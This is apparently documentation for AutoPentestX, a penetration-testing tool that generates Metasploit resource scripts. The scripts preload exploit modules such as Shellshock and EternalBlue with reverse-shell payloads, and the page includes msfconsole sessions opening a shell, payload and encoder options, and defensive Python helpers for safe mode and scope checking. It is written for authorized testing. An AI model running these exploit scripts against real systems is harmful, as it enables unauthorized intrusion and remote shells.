
Overview

AutoPentestX generates Metasploit Resource (RC) scripts during the exploitation assessment phase. These scripts allow security professionals to manually validate identified vulnerabilities in controlled environments. All scripts are generated in SAFE MODE by default and require manual activation.
Safe Mode: AutoPentestX never automatically executes exploits. All exploitation is simulated, and RC scripts are provided for manual review and execution by authorized professionals only.

RC Script Location

All Metasploit resource scripts are saved to the exploits/ directory:
exploits/
└── exploit_192.168.1.100_80_20251130_143215.rc
Naming Convention: exploit_{target}_{port}_{timestamp}.rc

RC Script Structure

Each generated script follows this format:
# Metasploit Resource Script
# Generated by AutoPentestX
# Target: 192.168.1.100:80
# Date: 2025-11-30 14:32:15

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.1.100
set RPORT 80
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
check
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit

Script Components

# Metasploit Resource Script
# Generated by AutoPentestX
# Target: 192.168.1.100:80
# Date: 2025-11-30 14:32:15
Metadata for tracking:
  • Script purpose
  • Generator tool
  • Target information
  • Generation timestamp
use exploit/multi/http/apache_mod_cgi_bash_env_exec
Specifies the Metasploit exploit module to load based on:
  • Detected vulnerability
  • Service version
  • CVE matching
set RHOSTS 192.168.1.100  # Remote target
set RPORT 80               # Vulnerable port
Pre-configured with scan results:
  • RHOSTS: Target IP or hostname
  • RPORT: Service port number
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0          # Placeholder: replace with your attack machine IP
set LPORT 4444              # Listening port
Default payload settings:
  • Reverse TCP shell (most compatible; the target connects back to LHOST:LPORT)
  • Placeholder LHOST (must be updated, or the handler binds to nothing useful and the session never arrives)
  • Standard port 4444
check
Vulnerability check without exploitation:
  • Runs the module's check method to verify whether the target is vulnerable
  • Does not deliver the payload
  • How intrusive the probe is depends on the module (some send requests that will appear in target logs), so treat "safe for production" as a per-module judgement, not a guarantee
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit
Manual activation required:
  • Prevents accidental execution
  • Requires explicit decision
  • Ensures authorized use only

Using RC Scripts

Loading in Metasploit Console

# Start Metasploit
msfconsole

# Load RC script
msf6 > resource exploits/exploit_192.168.1.100_80_20251130_143215.rc

# Script will load module and set options
# Review settings before proceeding
msf6 exploit(apache_mod_cgi_bash_env_exec) > show options

Checking Vulnerability

After loading the RC script:
msf6 exploit(apache_mod_cgi_bash_env_exec) > check

[*] 192.168.1.100:80 - The target appears to be vulnerable.
Check command results (Metasploit check codes):
  • The target is vulnerable / The target appears to be vulnerable - Exploit likely to succeed
  • The service is running, but could not be validated - Service detected, vulnerability unconfirmed
  • The target is not exploitable - Target not vulnerable
  • Cannot reliably check exploitability - Unknown (may still be vulnerable)
  • This module does not support check - No check method; validate manually before exploiting

Configuring Payload

Update the LHOST before execution:
# Set your attacker machine IP
msf6 exploit(apache_mod_cgi_bash_env_exec) > set LHOST 192.168.1.50

# Optionally change port
msf6 exploit(apache_mod_cgi_bash_env_exec) > set LPORT 4444

# Verify settings
msf6 exploit(apache_mod_cgi_bash_env_exec) > show options

Executing Exploit (Manual Only)

WARNING: Only execute exploits on systems you own or have explicit written authorization to test. Unauthorized exploitation is illegal.
# After verifying all settings and authorization
msf6 exploit(apache_mod_cgi_bash_env_exec) > exploit

[*] Started reverse TCP handler on 192.168.1.50:4444
[*] Command shell session 1 opened

shell>

Exploit Database

AutoPentestX includes built-in exploit mappings for common vulnerabilities:

FTP Exploits

Service          Exploit Module                            Description
vsftpd 2.3.4     exploit/unix/ftp/vsftpd_234_backdoor      VSFTPD v2.3.4 Backdoor Command Execution
ProFTPD 1.3.3c   exploit/unix/ftp/proftpd_133c_backdoor    ProFTPD 1.3.3c Backdoor

HTTP Exploits

Vulnerability    Exploit Module                                     Description
Shellshock       exploit/multi/http/apache_mod_cgi_bash_env_exec    Apache mod_cgi Bash Environment Variable Injection
Drupalgeddon2    exploit/unix/webapp/drupal_drupalgeddon2           Drupal Remote Code Execution

SMB Exploits

CVE              Exploit Module                                Description                              Safe
CVE-2017-0144    exploit/windows/smb/ms17_010_eternalblue      EternalBlue SMB Remote Code Execution    ⚠️ No*
*Potentially destructive - skipped in safe mode

Exploit Matching Logic

AutoPentestX uses two methods to match exploits:

1. Service Version Matching

Matches service banners to known vulnerable versions:
# Example: modules/exploit_engine.py:84-92
service = "ftp"
version = "vsftpd 2.3.4"

# Matches exploit_db key "vsftpd 2.3.4"
exploit = {
    'name': 'vsftpd_234_backdoor',
    'module': 'exploit/unix/ftp/vsftpd_234_backdoor',
    'confidence': 'HIGH'
}

2. CVE-to-Exploit Mapping

Matches CVE identifiers to exploit modules:
# Example: modules/exploit_engine.py:99-114
cve_exploits = {
    'CVE-2017-0144': 'EternalBlue',
    'CVE-2014-6271': 'Shellshock',
    'CVE-2018-7600': 'Drupalgeddon2'
}

Exploitation Output

During scan execution, the exploitation phase logs:
[STEP 6] Exploitation Assessment (Safe Mode)...
============================================================
AutoPentestX - Exploit Matching
============================================================

[✓] Exploit matched: apache_mod_cgi_bash_env_exec for port 80

[*] Total exploits matched: 1

============================================================
AutoPentestX - Exploitation Simulation
============================================================
Safe Mode: ENABLED
Target: 192.168.1.100
============================================================

[*] Running in SAFE MODE - No actual exploitation will occur
[*] Generating exploit feasibility reports...

[*] Simulating exploit: exploit/multi/http/apache_mod_cgi_bash_env_exec
    Target: 192.168.1.100:80
    Payload: generic/shell_reverse_tcp
[✓] Metasploit RC script saved: exploits/exploit_192.168.1.100_80_20251130_143215.rc
[*] Port 80: apache_mod_cgi_bash_env_exec - SIMULATED

============================================================
EXPLOITATION SUMMARY
============================================================
Exploits matched: 1
Exploits simulated: 1
Safe mode: ENABLED
============================================================

[i] Note: All exploitation was simulated only.
[i] RC scripts generated for manual testing if needed.

Customizing RC Scripts

After generation, you can manually customize scripts:

Change Payload

The payload must be compatible with the module's target platform and architecture; run show payloads from inside the module context to list the ones Metasploit will accept. The Apache mod_cgi module in the generated example targets Linux, so the Windows payloads below belong with Windows modules such as the SMB entry, not with that script.
# Original
set PAYLOAD generic/shell_reverse_tcp

# Meterpreter (more features; match the target platform, e.g. linux/x86/meterpreter/reverse_tcp for a Linux target)
set PAYLOAD windows/meterpreter/reverse_tcp

# Bind shell (alternative when the target cannot connect back to LHOST; the handler connects to the target instead)
set PAYLOAD windows/shell/bind_tcp
set RHOST 192.168.1.100

Add Advanced Options

# Enable verbose output
set VERBOSE true

# Set timeout
set WfsDelay 30

# Configure encoder
set ENCODER x86/shikata_ga_nai

# Set target index
set TARGET 0

Multiple Attempts

# Try different payloads in sequence. Only the last set PAYLOAD is in effect
# when an exploit line is uncommented, so uncomment one attempt at a time.
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.1.100
set RPORT 80

# Attempt 1: Generic shell
set PAYLOAD generic/shell_reverse_tcp
set LHOST 192.168.1.50
set LPORT 4444
check
# exploit

# Attempt 2: Command execution
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.1.50
set LPORT 4445
check
# exploit

Safe Mode Behavior

AutoPentestX implements multiple safety layers:
# modules/exploit_engine.py:22-52
exploit_db = {
    'Shellshock': {
        'name': 'apache_mod_cgi_bash_env_exec',
        'module': 'exploit/multi/http/apache_mod_cgi_bash_env_exec',
        'safe': True  # Safe to check
    },
    'EternalBlue': {
        'name': 'ms17_010_eternalblue',
        'module': 'exploit/windows/smb/ms17_010_eternalblue',
        'safe': False  # Potentially destructive
    }
}
Exploits marked as safe: False are automatically skipped in safe mode.
# modules/exploit_engine.py:119-154
if not self.safe_mode:
    print("[!] WARNING: Safe mode disabled")
    return {'status': 'BLOCKED'}

# Only simulate
result = {
    'status': 'SIMULATED',
    'safe_mode': True,
    'result': 'Exploit would be executed in non-safe mode'
}
Even with Metasploit available, exploits are never automatically executed.
All RC scripts include commented exploit commands:
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit
This prevents accidental execution via msfconsole -r script.rc.

Exploitation Report

Generate a JSON report of all exploitation attempts:
from modules.exploit_engine import ExploitEngine

exploit_engine = ExploitEngine(safe_mode=True)
# ... perform exploitation assessment ...
exploit_engine.generate_exploit_report('exploits/exploitation_report.json')
Output format:
{
  "timestamp": "2025-11-30T14:32:45",
  "safe_mode": true,
  "metasploit_available": true,
  "exploitation_results": [
    {
      "port": 80,
      "exploit_name": "apache_mod_cgi_bash_env_exec",
      "status": "SIMULATED",
      "description": "Apache mod_cgi Bash Environment Variable Code Injection",
      "confidence": "HIGH",
      "rc_script": "exploits/exploit_192.168.1.100_80_20251130_143215.rc"
    }
  ],
  "summary": {
    "total_attempts": 1,
    "simulated": 1,
    "skipped": 0,
    "successful": 0
  }
}
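An added example, not AutoPentestX's own code, tying together the RC script format and naming convention from the top of this page, the safe-mode skip for exploits flagged safe: False, and the JSON report layout shown above. The function names (`simulate_exploit`, `build_report`, `demo`), the shape of the match dicts and the sample matches are assumptions; the RC text, the file name pattern and the report fields follow the page.

```python
# Added example (not AutoPentestX code): safe-mode simulation that writes an
# RC script per matched exploit, skips destructive ones, and builds the report.
import json
import tempfile
from datetime import datetime
from pathlib import Path

RC_TEMPLATE = """\
# Metasploit Resource Script
# Generated by AutoPentestX
# Target: {target}:{port}
# Date: {date}

use {module}
set RHOSTS {target}
set RPORT {port}
set PAYLOAD {payload}
set LHOST {lhost}
set LPORT {lport}
check
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit
"""


def rc_filename(target, port, when):
    # Naming convention from the page: exploit_{target}_{port}_{timestamp}.rc
    return f"exploit_{target}_{port}_{when.strftime('%Y%m%d_%H%M%S')}.rc"


def render_rc(target, port, module, when, payload="generic/shell_reverse_tcp",
              lhost="0.0.0.0", lport=4444):
    # LHOST is left as the 0.0.0.0 placeholder on purpose: the operator sets it.
    return RC_TEMPLATE.format(target=target, port=port, module=module,
                              date=when.strftime("%Y-%m-%d %H:%M:%S"),
                              payload=payload, lhost=lhost, lport=lport)


def simulate_exploit(match, target, out_dir, safe_mode=True, when=None):
    """match: {'port', 'module', 'description', 'confidence', 'safe'} from the
    matching step (assumed layout). Never executes anything: it either writes
    an RC script for manual review or records a skip."""
    when = when or datetime.now()
    result = {"port": match["port"],
              "exploit_name": match["module"].rsplit("/", 1)[-1],
              "description": match["description"],
              "confidence": match["confidence"]}
    if safe_mode and not match["safe"]:
        result["status"] = "SKIPPED"      # destructive: no RC script at all
        return result
    path = Path(out_dir) / rc_filename(target, match["port"], when)
    path.write_text(render_rc(target, match["port"], match["module"], when))
    result["status"] = "SIMULATED"
    result["rc_script"] = str(path)
    return result


def build_report(results, safe_mode=True, metasploit_available=True, when=None):
    when = when or datetime.now()
    count = lambda s: sum(1 for r in results if r["status"] == s)
    return {
        "timestamp": when.strftime("%Y-%m-%dT%H:%M:%S"),
        "safe_mode": safe_mode,
        "metasploit_available": metasploit_available,
        "exploitation_results": results,
        "summary": {"total_attempts": len(results),
                    "simulated": count("SIMULATED"),
                    "skipped": count("SKIPPED"),
                    "successful": count("SUCCESS")},   # always 0 in safe mode
    }


# Constructed matches for one target: the Shellshock hit from the page plus an
# EternalBlue hit that safe mode must skip.
SAMPLE_MATCHES = [
    {"port": 80, "module": "exploit/multi/http/apache_mod_cgi_bash_env_exec",
     "description": "Apache mod_cgi Bash Environment Variable Code Injection",
     "confidence": "HIGH", "safe": True},
    {"port": 445, "module": "exploit/windows/smb/ms17_010_eternalblue",
     "description": "EternalBlue SMB Remote Code Execution",
     "confidence": "MEDIUM", "safe": False},
]


def demo(out_dir=None, when=datetime(2025, 11, 30, 14, 32, 15)):
    out_dir = out_dir or tempfile.mkdtemp(prefix="exploits_")
    results = [simulate_exploit(m, "192.168.1.100", out_dir, when=when)
               for m in SAMPLE_MATCHES]
    report = build_report(results, when=when)
    Path(out_dir, "exploitation_report.json").write_text(json.dumps(report, indent=2))
    return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The fixed timestamp in `demo` reproduces the file name used throughout this page; in a real run the generation time is used. Note that the skipped EternalBlue entry still appears in exploitation_results, so the report is an honest record of what was not attempted, not only of what was.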

Metasploit Detection

AutoPentestX automatically checks for Metasploit availability:
[✓] Metasploit Framework detected
Or:
[!] Metasploit not found - Exploitation features limited
If Metasploit is not installed, RC scripts are still generated but cannot be loaded on that host; copy them to a machine with msfconsole to use them.

Installing Metasploit

# Kali Linux (pre-installed)
msfconsole -v

# Ubuntu/Debian
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
./msfinstall

# Verify installation
which msfconsole

Best Practices

  1. Always Review Scripts: Inspect RC scripts before loading in Metasploit
  2. Verify Authorization: Ensure written permission before exploitation
  3. Use Check Command: Run check before exploit to verify vulnerability
  4. Update LHOST: Always set your correct attacker IP address
  5. Lab Environment: Test exploits in isolated lab environments first
  6. Document Actions: Keep records of all exploitation attempts
  7. Safe Payloads: Start with non-destructive payloads (reverse shells)
  8. Backup Targets: Back up target systems before exploitation (if possible)
Legal Disclaimer: Unauthorized exploitation of computer systems is illegal in most jurisdictions. Always obtain explicit written permission before conducting penetration tests. AutoPentestX is designed for authorized security assessments only.
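A pre-flight review that turns practices 1 through 4 above into an automated gate before an RC script is loaded with resource. This is an added example and not part of AutoPentestX: the `review_rc` function, the CIDR scope list standing in for the written authorization, and the module/payload platform heuristic are assumptions for illustration; the sample script is a copy of the one generated earlier on this page.

```python
# Added example (not AutoPentestX code): lint a generated RC script against
# the engagement scope and the "review before loading" practices on this page.
import ipaddress

# Copy of the page's generated script, used as constructed input.
SAMPLE_RC = """\
# Metasploit Resource Script
# Generated by AutoPentestX
# Target: 192.168.1.100:80
# Date: 2025-11-30 14:32:15

use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 192.168.1.100
set RPORT 80
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
check
# Exploit execution disabled in safe mode
# Uncomment to execute: exploit
"""


def parse_rc(text):
    """Split an RC script into datastore options ('set X Y') and the remaining
    console commands, in order. Comments and blank lines are ignored, which is
    exactly why a commented-out 'exploit' is inert when the file is loaded."""
    settings, commands = {}, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 2)
        if parts[0].lower() in ("set", "setg") and len(parts) == 3:
            settings[parts[1].upper()] = parts[2]
        else:
            commands.append(parts)
    return settings, commands


def review_rc(text, scope):
    """Return a list of findings; an empty list means the script is ready to load.
    scope: CIDR strings covered by the written authorization (assumed input)."""
    findings = []
    settings, commands = parse_rc(text)
    nets = [ipaddress.ip_network(c, strict=False) for c in scope]

    # 1. Every target must lie inside the authorized scope.
    for host in settings.get("RHOSTS", "").split(","):
        host = host.strip()
        if not host:
            findings.append("RHOSTS is not set")
            continue
        try:
            addr = ipaddress.ip_address(host)
        except ValueError:
            findings.append(f"RHOSTS '{host}' is a hostname; resolve it and confirm it is in scope")
            continue
        if not any(addr in n for n in nets):
            findings.append(f"RHOSTS {host} is outside the authorized scope")

    # 2. The generator's placeholder LHOST must have been replaced.
    if settings.get("LHOST", "0.0.0.0") == "0.0.0.0":
        findings.append("LHOST is the 0.0.0.0 placeholder; set your attack machine IP")

    # 3. 'resource' runs every uncommented line, so a live exploit/run fires immediately.
    verbs = [c[0].lower() for c in commands]
    if "exploit" in verbs or "run" in verbs:
        findings.append("script contains an uncommented exploit/run; loading it will launch the exploit")
    if "check" not in verbs:
        findings.append("no check step before exploitation")

    # 4. Heuristic platform sanity check between module path and payload (assumption:
    #    unix/linux/windows in the module path indicates the target platform).
    module = next((c[1] for c in commands if c[0] == "use" and len(c) > 1), "")
    payload = settings.get("PAYLOAD", "")
    if "/windows/" in module and payload.startswith(("linux/", "cmd/unix")):
        findings.append(f"payload {payload} will not run on a Windows target")
    if ("/unix/" in module or "/linux/" in module) and payload.startswith("windows/"):
        findings.append(f"payload {payload} will not run on a Unix/Linux target")
    return findings


if __name__ == "__main__":
    for finding in review_rc(SAMPLE_RC, ["192.168.1.0/24"]) or ["OK to load"]:
        print(finding)
```

Run against the page's own script the only finding is the placeholder LHOST, which is the mistake practice 4 warns about; an out-of-scope RHOSTS or an uncommented exploit line blocks loading outright. The parser deliberately mirrors how resource treats comments, so the "commented exploit" safety property is checked rather than assumed.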

Troubleshooting

Cause: No exploits matched to vulnerabilities
Solution:
  • Verify vulnerabilities were detected
  • Check if Metasploit is installed
  • Review logs for exploit matching errors
  • Manually search Metasploit for applicable exploits (search in msfconsole)
Cause: Exploit flagged as potentially destructive
Example:
[!] Skipping potentially dangerous exploit: ms17_010_eternalblue
Solution:
  • Review exploit safety classification
  • Use in isolated lab environment only
  • Manually execute with extreme caution
Cause: False positive from automated detection
Solution:
# Verify manually from the module context the RC script loads
msf6 exploit(apache_mod_cgi_bash_env_exec) > show options
msf6 exploit(apache_mod_cgi_bash_env_exec) > set VERBOSE true
msf6 exploit(apache_mod_cgi_bash_env_exec) > check
Cause: Firewall, incorrect LHOST, or payload mismatch
Solution:
# Verify network connectivity
ping 192.168.1.100

# LHOST must be an address the target can route to (not the 0.0.0.0 placeholder),
# and no firewall may block the return connection to LPORT
# If the target cannot connect back, try a bind payload for the target's platform
set PAYLOAD windows/meterpreter/bind_tcp
